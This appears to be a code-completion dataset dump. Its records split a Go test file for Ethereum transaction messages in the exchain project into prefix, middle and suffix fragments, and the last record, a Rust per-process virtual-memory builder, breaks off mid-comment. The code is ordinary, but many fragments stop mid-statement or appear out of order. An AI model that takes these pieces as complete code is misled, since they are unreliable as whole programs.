| TestMsgEthereumTx_ChainID | identifier_name |
msg_test.go | package types
import (
"bytes"
"fmt"
"github.com/ethereum/go-ethereum/common/hexutil"
"github.com/ethereum/go-ethereum/common/math"
"math/big"
"strings"
"testing"
"github.com/stretchr/testify/require"
"github.com/cosmos/cosmos-sdk/codec"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/okex/exchain/app/crypto/ethsecp256k1"
ethcmn "github.com/ethereum/go-ethereum/common"
ethtypes "github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/rlp"
"github.com/tendermint/tendermint/crypto/secp256k1"
)
func TestMsgEthermint(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
require.NotNil(t, msg)
require.Equal(t, msg.Recipient, &addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthermint)
require.True(t, bytes.Equal(msg.GetSignBytes(), sdk.MustSortJSON(ModuleCdc.MustMarshalJSON(msg))))
require.True(t, msg.GetSigners()[0].Equals(fromAddr))
require.Equal(t, *msg.To(), ethcmn.BytesToAddress(addr.Bytes()))
// clear recipient
msg.Recipient = nil
require.Nil(t, msg.To())
}
func TestMsgEthermintValidation(t *testing.T) {
testCases := []struct {
nonce uint64
to *sdk.AccAddress
amount sdk.Int
gasLimit uint64
gasPrice sdk.Int
payload []byte
expectPass bool
from sdk.AccAddress
}{
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(0), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(-1), gasPrice: sdk.NewInt(100000), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(-1), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthermint(tc.nonce, tc.to, tc.amount, tc.gasLimit, tc.gasPrice, tc.payload, tc.from)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "test: %v", i)
} else {
require.NotNil(t, msg.ValidateBasic(), "test: %v", i)
}
}
}
func TestMsgEthermintEncodingAndDecoding(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
raw, err := ModuleCdc.MarshalBinaryBare(msg)
require.NoError(t, err)
var msg2 MsgEthermint
err = ModuleCdc.UnmarshalBinaryBare(raw, &msg2)
require.NoError(t, err)
require.Equal(t, msg.AccountNonce, msg2.AccountNonce)
require.Equal(t, msg.Recipient, msg2.Recipient)
require.Equal(t, msg.Amount, msg2.Amount)
require.Equal(t, msg.GasLimit, msg2.GasLimit)
require.Equal(t, msg.Price, msg2.Price)
require.Equal(t, msg.Payload, msg2.Payload)
require.Equal(t, msg.From, msg2.From)
}
func newSdkAddress() sdk.AccAddress {
tmpKey := secp256k1.GenPrivKey().PubKey()
return sdk.AccAddress(tmpKey.Address().Bytes())
}
func TestMsgEthereumTx(t *testing.T) {
addr := GenerateEthAddress()
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Equal(t, *msg.Data.Recipient, addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthereumTx)
require.NotNil(t, msg.To())
require.Equal(t, msg.GetMsgs(), []sdk.Msg{msg})
require.Panics(t, func() { msg.GetSigners() })
require.Panics(t, func() { msg.GetSignBytes() })
msg = NewMsgEthereumTxContract(0, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Nil(t, msg.Data.Recipient)
require.Nil(t, msg.To())
}
func TestMsgEthereumTxValidation(t *testing.T) {
testCases := []struct {
msg string
amount *big.Int
gasPrice *big.Int
expectPass bool
}{
{msg: "pass", amount: big.NewInt(100), gasPrice: big.NewInt(100000), expectPass: true},
{msg: "invalid amount", amount: big.NewInt(-1), gasPrice: big.NewInt(100000), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(-1), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(0), expectPass: false},
}
for i, tc := range testCases |
}
func TestMsgEthereumTxRLPSignBytes(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
chainID := big.NewInt(3)
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
hash := msg.RLPSignBytes(chainID)
require.Equal(t, "5BD30E35AD27449390B14C91E6BCFDCAADF8FE44EF33680E3BC200FC0DC083C7", fmt.Sprintf("%X", hash))
}
func TestMsgEthereumTxRLPEncode(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
raw, err := rlp.EncodeToBytes(&msg)
require.NoError(t, err)
require.Equal(t, ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080"), raw)
}
func TestMsgEthereumTxRLPDecode(t *testing.T) {
var msg MsgEthereumTx
raw := ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080")
addr := ethcmn.BytesToAddress([]byte("test_address"))
expectedMsg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := rlp.Decode(bytes.NewReader(raw), &msg)
require.NoError(t, err)
require.Equal(t, expectedMsg.Data, msg.Data)
// value size exceeds available input length of stream
mockStream := rlp.NewStream(bytes.NewReader(raw), 1)
require.Error(t, msg.DecodeRLP(mockStream))
}
func TestMsgEthereumTxSig(t *testing.T) {
chainID, zeroChainID := big.NewInt(3), big.NewInt(0)
priv1, _ := ethsecp256k1.GenerateKey()
priv2, _ := ethsecp256k1.GenerateKey()
addr1 := ethcmn.BytesToAddress(priv1.PubKey().Address().Bytes())
trimed := strings.TrimPrefix(addr1.Hex(), "0x")
fmt.Printf("%s\n", trimed)
addrSDKAddr1, err := sdk.AccAddressFromHex(trimed)
require.NoError(t, err)
addr2 := ethcmn.BytesToAddress(priv2.PubKey().Address().Bytes())
// require valid signature passes validation
msg := NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err := msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
require.NotEqual(t, addr2, signer)
// msg atomic load
signer, err = msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
signers := msg.GetSigners()
require.Equal(t, 1, len(signers))
require.True(t, addrSDKAddr1.Equals(signers[0]))
// zero chainID
err = msg.Sign(zeroChainID, priv1.ToECDSA())
require.Nil(t, err)
_, err = msg.VerifySig(zeroChainID)
require.Nil(t, err)
// require invalid chain ID fail validation
msg = NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err = msg.VerifySig(big.NewInt(4))
require.Error(t, err)
require.Equal(t, ethcmn.Address{}, signer)
}
func TestMsgEthereumTx_ChainID(t *testing.T) {
chainID := big.NewInt(3)
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := msg.Sign(chainID, priv.ToECDSA())
require.Nil(t, err)
require.True(t, chainID.Cmp(msg.ChainID()) == 0)
msg.Data.V = big.NewInt(27)
require.NotNil(t, msg.ChainID())
msg.Data.V = math.MaxBig256
expectedChainID := new(big.Int).Div(new(big.Int).Sub(math.MaxBig256, big.NewInt(35)), big.NewInt(2))
require.True(t, expectedChainID.Cmp(msg.ChainID()) == 0)
}
func TestMsgEthereumTxGetter(t *testing.T) {
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
amount, gasPrice, gasLimit := int64(1024), int64(2048), uint64(100000)
expectedFee := gasPrice * int64(gasLimit)
expectCost := expectedFee + amount
msg := NewMsgEthereumTx(0, &addr, big.NewInt(amount), gasLimit, big.NewInt(gasPrice), []byte("test"))
require.Equal(t, gasLimit, msg.GetGas())
require.True(t, big.NewInt(expectedFee).Cmp(msg.Fee()) == 0)
require.True(t, big.NewInt(expectCost).Cmp(msg.Cost()) == 0)
expectedV, expectedR, expectedS := big.NewInt(1), big.NewInt(2), big.NewInt(3)
msg.Data.V, msg.Data.R, msg.Data.S = expectedV, expectedR, expectedS
v, r, s := msg.RawSignatureValues()
require.True(t, expectedV.Cmp(v) == 0)
require.True(t, expectedR.Cmp(r) == 0)
require.True(t, expectedS.Cmp(s) == 0)
}
func TestMarshalAndUnmarshalLogs(t *testing.T) {
var cdc = codec.New()
logs := []*ethtypes.Log{
{
Address: ethcmn.BytesToAddress([]byte{0x11}),
TxHash: ethcmn.HexToHash("0x01"),
// May need to find workaround since Topics is required to unmarshal from JSON
Topics: []ethcmn.Hash{},
Removed: true,
},
{Address: ethcmn.BytesToAddress([]byte{0x01, 0x11}), Topics: []ethcmn.Hash{}},
}
raw, err := codec.MarshalJSONIndent(cdc, logs)
require.NoError(t, err)
var logs2 []*ethtypes.Log
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
require.Len(t, logs2, 2)
require.Equal(t, logs[0].Address, logs2[0].Address)
require.Equal(t, logs[0].TxHash, logs2[0].TxHash)
require.True(t, logs[0].Removed)
emptyLogs := []*ethtypes.Log{}
raw, err = codec.MarshalJSONIndent(cdc, emptyLogs)
require.NoError(t, err)
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
}
func TestMsgString(t *testing.T) {
expectedUint64, expectedSDKAddr, expectedInt := uint64(1024), newSdkAddress(), sdk.OneInt()
expectedPayload, err := hexutil.Decode("0x1234567890abcdef")
require.NoError(t, err)
expectedOutput := fmt.Sprintf("nonce=1024 gasPrice=1 gasLimit=1024 recipient=%s amount=1 data=0x1234567890abcdef from=%s",
expectedSDKAddr, expectedSDKAddr)
msgEthermint := NewMsgEthermint(expectedUint64, &expectedSDKAddr, expectedInt, expectedUint64, expectedInt, expectedPayload, expectedSDKAddr)
require.True(t, strings.EqualFold(msgEthermint.String(), expectedOutput))
expectedHexAddr := ethcmn.BytesToAddress([]byte{0x01})
expectedBigInt := big.NewInt(1024)
expectedOutput = fmt.Sprintf("nonce=1024 price=1024 gasLimit=1024 recipient=%s amount=1024 data=0x1234567890abcdef v=0 r=0 s=0", expectedHexAddr.Hex())
msgEthereumTx := NewMsgEthereumTx(expectedUint64, &expectedHexAddr, expectedBigInt, expectedUint64, expectedBigInt, expectedPayload)
require.True(t, strings.EqualFold(msgEthereumTx.String(), expectedOutput))
}
| {
msg := NewMsgEthereumTx(0, nil, tc.amount, 0, tc.gasPrice, nil)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "valid test %d failed: %s", i, tc.msg)
} else {
require.NotNil(t, msg.ValidateBasic(), "invalid test %d passed: %s", i, tc.msg)
}
} | conditional_block |
msg_test.go | package types
import (
"bytes"
"fmt"
"github.com/ethereum/go-ethereum/common/hexutil"
"github.com/ethereum/go-ethereum/common/math"
"math/big"
"strings"
"testing"
"github.com/stretchr/testify/require"
"github.com/cosmos/cosmos-sdk/codec"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/okex/exchain/app/crypto/ethsecp256k1"
ethcmn "github.com/ethereum/go-ethereum/common"
ethtypes "github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/rlp"
"github.com/tendermint/tendermint/crypto/secp256k1"
)
func TestMsgEthermint(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
require.NotNil(t, msg)
require.Equal(t, msg.Recipient, &addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthermint)
require.True(t, bytes.Equal(msg.GetSignBytes(), sdk.MustSortJSON(ModuleCdc.MustMarshalJSON(msg))))
require.True(t, msg.GetSigners()[0].Equals(fromAddr))
require.Equal(t, *msg.To(), ethcmn.BytesToAddress(addr.Bytes()))
// clear recipient
msg.Recipient = nil
require.Nil(t, msg.To())
}
func TestMsgEthermintValidation(t *testing.T) {
testCases := []struct {
nonce uint64
to *sdk.AccAddress
amount sdk.Int
gasLimit uint64
gasPrice sdk.Int
payload []byte
expectPass bool
from sdk.AccAddress
}{
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(0), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(-1), gasPrice: sdk.NewInt(100000), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(-1), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthermint(tc.nonce, tc.to, tc.amount, tc.gasLimit, tc.gasPrice, tc.payload, tc.from)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "test: %v", i)
} else {
require.NotNil(t, msg.ValidateBasic(), "test: %v", i)
}
}
}
func TestMsgEthermintEncodingAndDecoding(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
raw, err := ModuleCdc.MarshalBinaryBare(msg)
require.NoError(t, err)
var msg2 MsgEthermint
err = ModuleCdc.UnmarshalBinaryBare(raw, &msg2)
require.NoError(t, err)
require.Equal(t, msg.AccountNonce, msg2.AccountNonce)
require.Equal(t, msg.Recipient, msg2.Recipient)
require.Equal(t, msg.Amount, msg2.Amount)
require.Equal(t, msg.GasLimit, msg2.GasLimit)
require.Equal(t, msg.Price, msg2.Price)
require.Equal(t, msg.Payload, msg2.Payload)
require.Equal(t, msg.From, msg2.From)
}
func newSdkAddress() sdk.AccAddress {
tmpKey := secp256k1.GenPrivKey().PubKey()
return sdk.AccAddress(tmpKey.Address().Bytes())
}
func TestMsgEthereumTx(t *testing.T) {
addr := GenerateEthAddress()
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Equal(t, *msg.Data.Recipient, addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthereumTx)
require.NotNil(t, msg.To())
require.Equal(t, msg.GetMsgs(), []sdk.Msg{msg})
require.Panics(t, func() { msg.GetSigners() })
require.Panics(t, func() { msg.GetSignBytes() })
msg = NewMsgEthereumTxContract(0, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Nil(t, msg.Data.Recipient)
require.Nil(t, msg.To())
}
func TestMsgEthereumTxValidation(t *testing.T) {
testCases := []struct {
msg string
amount *big.Int
gasPrice *big.Int
expectPass bool
}{
{msg: "pass", amount: big.NewInt(100), gasPrice: big.NewInt(100000), expectPass: true},
{msg: "invalid amount", amount: big.NewInt(-1), gasPrice: big.NewInt(100000), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(-1), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(0), expectPass: false}, | }
for i, tc := range testCases {
msg := NewMsgEthereumTx(0, nil, tc.amount, 0, tc.gasPrice, nil)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "valid test %d failed: %s", i, tc.msg)
} else {
require.NotNil(t, msg.ValidateBasic(), "invalid test %d passed: %s", i, tc.msg)
}
}
}
func TestMsgEthereumTxRLPSignBytes(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
chainID := big.NewInt(3)
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
hash := msg.RLPSignBytes(chainID)
require.Equal(t, "5BD30E35AD27449390B14C91E6BCFDCAADF8FE44EF33680E3BC200FC0DC083C7", fmt.Sprintf("%X", hash))
}
func TestMsgEthereumTxRLPEncode(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
raw, err := rlp.EncodeToBytes(&msg)
require.NoError(t, err)
require.Equal(t, ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080"), raw)
}
func TestMsgEthereumTxRLPDecode(t *testing.T) {
var msg MsgEthereumTx
raw := ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080")
addr := ethcmn.BytesToAddress([]byte("test_address"))
expectedMsg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := rlp.Decode(bytes.NewReader(raw), &msg)
require.NoError(t, err)
require.Equal(t, expectedMsg.Data, msg.Data)
// value size exceeds available input length of stream
mockStream := rlp.NewStream(bytes.NewReader(raw), 1)
require.Error(t, msg.DecodeRLP(mockStream))
}
func TestMsgEthereumTxSig(t *testing.T) {
chainID, zeroChainID := big.NewInt(3), big.NewInt(0)
priv1, _ := ethsecp256k1.GenerateKey()
priv2, _ := ethsecp256k1.GenerateKey()
addr1 := ethcmn.BytesToAddress(priv1.PubKey().Address().Bytes())
trimed := strings.TrimPrefix(addr1.Hex(), "0x")
fmt.Printf("%s\n", trimed)
addrSDKAddr1, err := sdk.AccAddressFromHex(trimed)
require.NoError(t, err)
addr2 := ethcmn.BytesToAddress(priv2.PubKey().Address().Bytes())
// require valid signature passes validation
msg := NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err := msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
require.NotEqual(t, addr2, signer)
// msg atomic load
signer, err = msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
signers := msg.GetSigners()
require.Equal(t, 1, len(signers))
require.True(t, addrSDKAddr1.Equals(signers[0]))
// zero chainID
err = msg.Sign(zeroChainID, priv1.ToECDSA())
require.Nil(t, err)
_, err = msg.VerifySig(zeroChainID)
require.Nil(t, err)
// require invalid chain ID fail validation
msg = NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err = msg.VerifySig(big.NewInt(4))
require.Error(t, err)
require.Equal(t, ethcmn.Address{}, signer)
}
func TestMsgEthereumTx_ChainID(t *testing.T) {
chainID := big.NewInt(3)
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := msg.Sign(chainID, priv.ToECDSA())
require.Nil(t, err)
require.True(t, chainID.Cmp(msg.ChainID()) == 0)
msg.Data.V = big.NewInt(27)
require.NotNil(t, msg.ChainID())
msg.Data.V = math.MaxBig256
expectedChainID := new(big.Int).Div(new(big.Int).Sub(math.MaxBig256, big.NewInt(35)), big.NewInt(2))
require.True(t, expectedChainID.Cmp(msg.ChainID()) == 0)
}
func TestMsgEthereumTxGetter(t *testing.T) {
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
amount, gasPrice, gasLimit := int64(1024), int64(2048), uint64(100000)
expectedFee := gasPrice * int64(gasLimit)
expectCost := expectedFee + amount
msg := NewMsgEthereumTx(0, &addr, big.NewInt(amount), gasLimit, big.NewInt(gasPrice), []byte("test"))
require.Equal(t, gasLimit, msg.GetGas())
require.True(t, big.NewInt(expectedFee).Cmp(msg.Fee()) == 0)
require.True(t, big.NewInt(expectCost).Cmp(msg.Cost()) == 0)
expectedV, expectedR, expectedS := big.NewInt(1), big.NewInt(2), big.NewInt(3)
msg.Data.V, msg.Data.R, msg.Data.S = expectedV, expectedR, expectedS
v, r, s := msg.RawSignatureValues()
require.True(t, expectedV.Cmp(v) == 0)
require.True(t, expectedR.Cmp(r) == 0)
require.True(t, expectedS.Cmp(s) == 0)
}
func TestMarshalAndUnmarshalLogs(t *testing.T) {
var cdc = codec.New()
logs := []*ethtypes.Log{
{
Address: ethcmn.BytesToAddress([]byte{0x11}),
TxHash: ethcmn.HexToHash("0x01"),
// May need to find workaround since Topics is required to unmarshal from JSON
Topics: []ethcmn.Hash{},
Removed: true,
},
{Address: ethcmn.BytesToAddress([]byte{0x01, 0x11}), Topics: []ethcmn.Hash{}},
}
raw, err := codec.MarshalJSONIndent(cdc, logs)
require.NoError(t, err)
var logs2 []*ethtypes.Log
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
require.Len(t, logs2, 2)
require.Equal(t, logs[0].Address, logs2[0].Address)
require.Equal(t, logs[0].TxHash, logs2[0].TxHash)
require.True(t, logs[0].Removed)
emptyLogs := []*ethtypes.Log{}
raw, err = codec.MarshalJSONIndent(cdc, emptyLogs)
require.NoError(t, err)
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
}
func TestMsgString(t *testing.T) {
expectedUint64, expectedSDKAddr, expectedInt := uint64(1024), newSdkAddress(), sdk.OneInt()
expectedPayload, err := hexutil.Decode("0x1234567890abcdef")
require.NoError(t, err)
expectedOutput := fmt.Sprintf("nonce=1024 gasPrice=1 gasLimit=1024 recipient=%s amount=1 data=0x1234567890abcdef from=%s",
expectedSDKAddr, expectedSDKAddr)
msgEthermint := NewMsgEthermint(expectedUint64, &expectedSDKAddr, expectedInt, expectedUint64, expectedInt, expectedPayload, expectedSDKAddr)
require.True(t, strings.EqualFold(msgEthermint.String(), expectedOutput))
expectedHexAddr := ethcmn.BytesToAddress([]byte{0x01})
expectedBigInt := big.NewInt(1024)
expectedOutput = fmt.Sprintf("nonce=1024 price=1024 gasLimit=1024 recipient=%s amount=1024 data=0x1234567890abcdef v=0 r=0 s=0", expectedHexAddr.Hex())
msgEthereumTx := NewMsgEthereumTx(expectedUint64, &expectedHexAddr, expectedBigInt, expectedUint64, expectedBigInt, expectedPayload)
require.True(t, strings.EqualFold(msgEthereumTx.String(), expectedOutput))
} | random_line_split | |
process_vm.rs | use super::*;
use super::chunk::*;
use super::user_space_vm::USER_SPACE_VM_MANAGER;
use super::vm_area::VMArea;
use super::vm_perms::VMPerms;
use super::vm_util::{
FileBacked, VMInitializer, VMMapAddr, VMMapOptions, VMMapOptionsBuilder, VMRemapOptions,
};
use crate::config;
use crate::ipc::SHM_MANAGER;
use crate::process::elf_file::{ElfFile, ProgramHeaderExt};
use crate::util::sync::rw_lock::RwLockWriteGuard;
use std::collections::HashSet;
// Used for heap and stack start address randomization.
const RANGE_FOR_RANDOMIZATION: usize = 256 * 4096; // 1M
#[derive(Debug, Clone)]
pub struct ProcessVMBuilder<'a, 'b> {
elfs: Vec<&'b ElfFile<'a>>,
heap_size: Option<usize>,
stack_size: Option<usize>,
mmap_size: Option<usize>,
}
impl<'a, 'b> ProcessVMBuilder<'a, 'b> {
pub fn new(elfs: Vec<&'b ElfFile<'a>>) -> ProcessVMBuilder<'a, 'b> {
ProcessVMBuilder {
elfs: elfs,
heap_size: None,
stack_size: None,
mmap_size: None,
}
}
pub fn set_heap_size(&mut self, heap_size: usize) -> &mut Self {
self.heap_size = Some(heap_size);
self
}
pub fn set_stack_size(&mut self, stack_size: usize) -> &mut Self {
self.stack_size = Some(stack_size);
self
}
pub fn set_mmap_size(&mut self, mmap_size: usize) -> &mut Self {
self.mmap_size = Some(mmap_size);
self
}
// Generate a random address within [0, range]
// Note: This function doesn't guarantee alignment
fn get_randomize_offset(range: usize) -> usize {
if cfg!(debug_assertions) {
return range;
}
use crate::misc;
trace!("entropy size = {}", range);
let mut random_buf: [u8; 8] = [0u8; 8]; // same length as usize
misc::get_random(&mut random_buf).expect("failed to get random number");
let random_num: usize = u64::from_le_bytes(random_buf) as usize;
random_num % range
}
pub fn build(self) -> Result<ProcessVM> {
self.validate()?;
let heap_size = self
.heap_size
.unwrap_or(config::LIBOS_CONFIG.process.default_heap_size);
let stack_size = self
.stack_size
.unwrap_or(config::LIBOS_CONFIG.process.default_stack_size);
// Before allocating memory, let's first calculate how much memory
// we need in total by iterating the memory layouts required by
// all the memory regions
let elf_layouts: Vec<VMLayout> = self
.elfs
.iter()
.map(|elf| {
elf.program_headers()
.filter(|segment| segment.loadable())
.fold(VMLayout::new_empty(), |mut elf_layout, segment| {
let segment_size = (segment.p_vaddr + segment.p_memsz) as usize;
let segment_align = segment.p_align as usize;
let segment_layout = VMLayout::new(segment_size, segment_align).unwrap();
elf_layout.extend(&segment_layout);
elf_layout
})
})
.collect();
// Make heap and stack 16-byte aligned
let other_layouts = vec![
VMLayout::new(heap_size, 16)?,
VMLayout::new(stack_size, 16)?,
];
let process_layout = elf_layouts.iter().chain(other_layouts.iter()).fold(
VMLayout::new_empty(),
|mut process_layout, sub_layout| {
process_layout.add(&sub_layout);
process_layout
},
);
// Now that we end up with the memory layout required by the process,
// let's allocate the memory for the process
let mut chunks = HashSet::new();
// Init the memory for ELFs in the process
let mut elf_ranges = Vec::with_capacity(2);
elf_layouts
.iter()
.zip(self.elfs.iter())
.map(|(elf_layout, elf_file)| {
let vm_option = VMMapOptionsBuilder::default()
.size(elf_layout.size())
.align(elf_layout.align())
.perms(VMPerms::ALL) // set it to read | write | exec for simplicity
.initializer(VMInitializer::ElfSpecific {
elf_file: elf_file.file_ref().clone(),
})
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (elf_range, chunk_ref) =
USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(elf_range.start() % elf_layout.align() == 0);
chunks.insert(chunk_ref);
Self::init_elf_memory(&elf_range, elf_file).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
trace!("elf range = {:?}", elf_range);
elf_ranges.push(elf_range);
Ok(())
})
.collect::<Result<()>>()?;
// Init the heap memory in the process
let heap_layout = &other_layouts[0];
let vm_option = VMMapOptionsBuilder::default()
.size(heap_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (heap_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(heap_range.start() % heap_layout.align() == 0);
trace!("heap range = {:?}", heap_range);
let brk = RwLock::new(heap_range.start());
chunks.insert(chunk_ref);
// Init the stack memory in the process
let stack_layout = &other_layouts[1];
let vm_option = VMMapOptionsBuilder::default()
.size(stack_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (stack_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(stack_range.start() % stack_layout.align() == 0);
chunks.insert(chunk_ref);
trace!("stack range = {:?}", stack_range);
let mem_chunks = Arc::new(RwLock::new(chunks));
Ok(ProcessVM {
elf_ranges,
heap_range,
stack_range,
brk,
mem_chunks,
})
}
fn validate(&self) -> Result<()> {
let validate_size = |size_opt| -> Result<()> {
if let Some(size) = size_opt {
if size == 0 || size % PAGE_SIZE != 0 {
return_errno!(EINVAL, "invalid size");
}
}
Ok(())
};
validate_size(self.heap_size)?;
validate_size(self.stack_size)?;
validate_size(self.mmap_size)?;
Ok(())
}
fn handle_error_when_init(&self, chunks: &HashSet<Arc<Chunk>>) {
chunks.iter().for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(chunk, None, false);
});
}
fn init_elf_memory(elf_range: &VMRange, elf_file: &ElfFile) -> Result<()> {
// Destination buffer: ELF appeared in the process
let elf_proc_buf = unsafe { elf_range.as_slice_mut() };
// Source buffer: ELF stored in the ELF file
let elf_file_buf = elf_file.as_slice();
let base_load_address_offset = elf_file.base_load_address_offset() as usize;
// Offsets to track zerolized range
let mut empty_start_offset = 0;
let mut empty_end_offset = 0;
// Init all loadable segments
elf_file
.program_headers()
.filter(|segment| segment.loadable())
.for_each(|segment| {
let file_size = segment.p_filesz as usize;
let file_offset = segment.p_offset as usize;
let mem_addr = segment.p_vaddr as usize;
let mem_size = segment.p_memsz as usize;
let alignment = segment.p_align as usize;
debug_assert!(file_size <= mem_size);
let mem_start_offset = mem_addr - base_load_address_offset;
// Initialize empty part to zero based on alignment
empty_start_offset = align_down(mem_start_offset, alignment);
for b in &mut elf_proc_buf[empty_start_offset..mem_start_offset] {
*b = 0;
}
// Bytes of file_size length are loaded from the ELF file
elf_file.file_ref().read_at(
file_offset,
&mut elf_proc_buf[mem_start_offset..mem_start_offset + file_size],
);
// Set the remaining part to zero based on alignment
debug_assert!(file_size <= mem_size);
empty_end_offset = align_up(mem_start_offset + mem_size, alignment);
for b in &mut elf_proc_buf[mem_start_offset + file_size..empty_end_offset] {
*b = 0;
}
});
Ok(())
}
}
// MemChunks is the structure to track all the chunks which are used by this process.
type MemChunks = Arc<RwLock<HashSet<ChunkRef>>>;
/// The per-process virtual memory
#[derive(Debug)]
pub struct ProcessVM {
elf_ranges: Vec<VMRange>,
heap_range: VMRange,
stack_range: VMRange,
brk: RwLock<usize>,
// Memory safety notes: the mem_chunks field must be the last one.
//
// Rust drops fields in the same order as they are declared. So by making
// mem_chunks the last field, we ensure that when all other fields are
// dropped, their drop methods (if provided) can still access the memory
